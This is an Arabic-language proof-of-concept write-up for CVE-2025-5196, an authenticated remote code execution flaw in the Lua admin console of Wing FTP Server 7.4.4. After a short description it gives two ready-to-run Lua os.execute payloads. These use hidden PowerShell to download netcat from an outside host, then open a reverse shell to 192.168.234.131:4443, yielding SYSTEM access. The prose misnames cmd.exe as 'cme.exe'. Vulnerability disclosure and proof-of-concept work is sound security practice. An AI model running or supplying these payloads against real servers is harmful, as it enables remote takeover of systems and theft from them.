
Wing FTP Server يوفر وحدة تحكم إدارية للبرمجة النصية بلغة Lua يمكن الوصول إليها عبر واجهة الويب الخاصة به. يمكن للمسؤولين الموثقين تنفيذ كود Lua تعسفي مع عدم كفاية العزلة. CVE-2025-5196
يوفر خادم Wing FTP وحدة تحكم برمجة Lua إدارية يمكن الوصول إليها عبر واجهة الويب الخاصة به. يمكن للمسؤولين المُصادق عليهم تنفيذ كود Lua عشوائي مع عدم كفاية العزل.
الإصدار المتأثر: Wing FTP Server 7.4.4 (Windows) | المصادقة مطلوبة: نعم
حتى 24 مايو 2025، يمكن العثور على أحدث إصدار من التطبيق الذي يوفره المورّد على الرابط التالي: https://www.wftpserver.com/download.htm
بالإضافة إلى ذلك، يمكن ملاحظة أنه حتى نفس التاريخ، هناك ملاحظة إصدار منشورة تُفيد بأن ثغرة RCE قد تم إصلاحها في الإصدار 7.4.4. يمكن العثور على رابط ملاحظات الإصدار هنا: https://www.wftpserver.com/serverhistory.htm

إثبات المفهوم المتعلق بـ CVE-2025-5196 VulDB

واجهة الويب لخادم Wing FTP


الجزء الأول من الأمر سيقوم بتنزيل ملف nc.exe (netcat لنظام Windows x86) إلى المسار "C:\Users\usuario\Desktop\Drops". أما الجزء الثاني فسينفذ nc.exe 192.168.234.131 4443 -e cme.exe.
os.execute('powershell -NoP -NonI -W Hidden -Exec Bypass -Command "(New-Object Net.WebClient).DownloadFile(\'http://192.168.234.131:8000/nc.exe\', \'C:\\\\Users\\\\usuario\\\\Desktop\\\\Drops\\\\nc.exe\')"')
os.execute('cmd /c powershell -NoP -W Hidden -Command "Start-Process \\"C:\\Users\\usuario\\Desktop\\Drops\\nc.exe\\" -ArgumentList \\"192.168.234.131\\",\\"4443\\",\\"-e\\",\\"cmd.exe\\""')

قشرة NT/SYSTEM
